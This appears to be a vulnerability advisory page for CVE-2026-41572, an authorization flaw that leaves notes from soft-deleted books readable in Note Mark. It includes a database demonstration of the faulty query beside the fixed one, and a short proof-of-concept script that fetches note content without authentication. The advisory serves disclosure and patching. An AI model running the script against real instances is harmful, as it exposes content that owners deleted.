Security Vulnerability Report
CVE-2026-41572 CVSS 5.3 MEDIUM

CVE-2026-41572

Published: 2026-05-04 18:16:30
Last Modified: 2026-05-07 15:43:40

Description

Note Mark is an open-source note-taking application. Prior to version 0.19.3, after a note-mark owner soft-deletes a public book, its notes and uploaded assets stay readable at /api/notes/{id}, /api/notes/{id}/content, the slug URL, and the asset endpoints. Unauthenticated callers who hold the note ID or the slug path retain access. The root cause is an authorization check that relies on an ORM default (CWE-285, improper authorization): GORM's soft-delete scope appends a `deleted_at IS NULL` filter (deleted_at being GORM's default soft-delete column) only for the model a query is built on, so the raw "JOIN books ..." clauses used by the note and asset queries never exclude a book whose deleted_at is set, and a note in a soft-deleted book still satisfies the public-book condition. This issue has been patched in version 0.19.3.
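Worked example (added here, not Note Mark's own code). The schema, rows and query strings below are constructed to mimic the SQL a GORM query with a raw Joins("JOIN books ...") clause produces: the soft-delete scope contributes `notes.deleted_at IS NULL` for the model being queried and nothing for the joined books table. The table and column names (books, notes, is_public, deleted_at) are assumptions for the illustration; deleted_at is GORM's default soft-delete column. The script runs the unscoped query beside the fixed one, before and after the book is soft-deleted, so the difference is visible on real rows.

```python
"""
Added illustration (not Note Mark's code): why a soft-delete scope on the
queried model does not protect rows reached through a raw JOIN.

The schema, rows and query text are constructed for this example. They
mimic the SQL an ORM such as GORM emits when its soft-delete scope adds
`deleted_at IS NULL` for the primary model only.
"""
import sqlite3
from datetime import datetime, timezone

# Assumed schema: column names follow GORM's default `deleted_at` marker.
SCHEMA = """
CREATE TABLE books (
    id INTEGER PRIMARY KEY,
    owner_id INTEGER NOT NULL,
    is_public INTEGER NOT NULL DEFAULT 0,
    deleted_at TEXT            -- NULL = live, timestamp = soft-deleted
);
CREATE TABLE notes (
    id INTEGER PRIMARY KEY,
    book_id INTEGER NOT NULL REFERENCES books(id),
    slug TEXT NOT NULL,
    body TEXT NOT NULL,
    deleted_at TEXT
);
"""

# Vulnerable shape: the scope filters notes.deleted_at, but the books row
# pulled in via the raw JOIN gets no such filter, so a note whose parent
# book was soft-deleted still matches the "public book" condition.
UNSCOPED_JOIN = """
SELECT notes.id, notes.body
FROM notes
JOIN books ON books.id = notes.book_id AND books.is_public = 1
WHERE notes.id = ? AND notes.deleted_at IS NULL
"""

# Fixed shape: the join condition (or the WHERE clause) must also assert
# that the parent book is live; the ORM will not add this for you.
SCOPED_JOIN = """
SELECT notes.id, notes.body
FROM notes
JOIN books ON books.id = notes.book_id
          AND books.is_public = 1
          AND books.deleted_at IS NULL
WHERE notes.id = ? AND notes.deleted_at IS NULL
"""


def build_db() -> sqlite3.Connection:
    """Create an in-memory DB with one public book and one note in it (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.execute("INSERT INTO books (id, owner_id, is_public) VALUES (1, 42, 1)")
    conn.execute(
        "INSERT INTO notes (id, book_id, slug, body) VALUES (1, 1, 'hello', 'secret draft')"
    )
    conn.commit()
    return conn


def soft_delete_book(conn: sqlite3.Connection, book_id: int) -> None:
    """Owner soft-deletes the book: the row stays, only deleted_at is set."""
    stamp = datetime.now(timezone.utc).isoformat()
    conn.execute("UPDATE books SET deleted_at = ? WHERE id = ?", (stamp, book_id))
    conn.commit()


def fetch_public_note(conn: sqlite3.Connection, note_id: int, scoped: bool):
    """Anonymous read of a note by ID; returns (id, body) or None when filtered out."""
    sql = SCOPED_JOIN if scoped else UNSCOPED_JOIN
    return conn.execute(sql, (note_id,)).fetchone()


def demo() -> dict:
    """Run both query shapes before and after the soft delete and return the rows seen."""
    conn = build_db()
    before = {
        "unscoped": fetch_public_note(conn, 1, scoped=False),
        "scoped": fetch_public_note(conn, 1, scoped=True),
    }
    soft_delete_book(conn, 1)
    after = {
        "unscoped": fetch_public_note(conn, 1, scoped=False),
        "scoped": fetch_public_note(conn, 1, scoped=True),
    }
    return {"before": before, "after": after}


if __name__ == "__main__":
    for phase, result in demo().items():
        print(f"{phase}: unscoped={result['unscoped']!r} scoped={result['scoped']!r}")
```

After the soft delete the unscoped query still returns the note while the scoped one returns nothing. In GORM terms the fix is to write the `books.deleted_at IS NULL` condition yourself, in the Joins string or a Where call, because the soft-delete query clause is attached only to the statement's primary table; the same applies to the asset queries that join through books.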

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No NVD configuration (CPE) data is available yet (vulnStatus: Deferred); the affected range below is taken from the advisory description.

Note Mark < 0.19.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target URL of the vulnerable Note Mark instance (placeholder, replace it)
target_url = "http://target-domain.com"

# The ID of a note that belongs to a book its owner has already soft-deleted.
# A 200 on a note in a live public book is expected behaviour, not a finding,
# so confirm the book's state before reading anything into the result.
note_id = "1"

# Endpoint to access note content.
# Vulnerable endpoints include /api/notes/{id} and /api/notes/{id}/content;
# the slug URL and the asset endpoints are affected the same way.
endpoint = f"{target_url}/api/notes/{note_id}/content"

try:
    # Send an unauthenticated GET: no session cookie, no token
    response = requests.get(endpoint, timeout=10)

    # Content still served with HTTP 200 means the soft-delete scope
    # was not applied to the joined books row
    if response.status_code == 200:
        print("[+] Vulnerability Confirmed! Note content retrieved:")
        print(response.text)
    else:
        print(f"[-] Note not accessible. Status code: {response.status_code}")
except requests.RequestException as e:
    print(f"Error: {e}")
```

References

https://github.com/enchant97/note-mark/releases/tag/v0.19.3
https://github.com/enchant97/note-mark/security/advisories/GHSA-3gr9-485j-v4xf

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41572", "sourceIdentifier": "[email protected]", "published": "2026-05-04T18:16:29.763", "lastModified": "2026-05-07T15:43:39.827", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Note Mark is an open-source note-taking application. Prior to version 0.19.3, after a note-mark owner soft-deletes a public book, its notes and uploaded assets stay readable at /api/notes/{id}, /api/notes/{id}/content, the slug URL, and the asset endpoints. Unauthenticated callers who hold the note ID or the slug path retain access. GORM's soft-delete scope does not reach the raw \"JOIN books ...\" clauses used by the note and asset queries. This issue has been patched in version 0.19.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-285"}]}], "references": [{"url": "https://github.com/enchant97/note-mark/releases/tag/v0.19.3", "source": "[email protected]"}, {"url": "https://github.com/enchant97/note-mark/security/advisories/GHSA-3gr9-485j-v4xf", "source": "[email protected]"}, {"url": "https://github.com/enchant97/note-mark/security/advisories/GHSA-3gr9-485j-v4xf", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}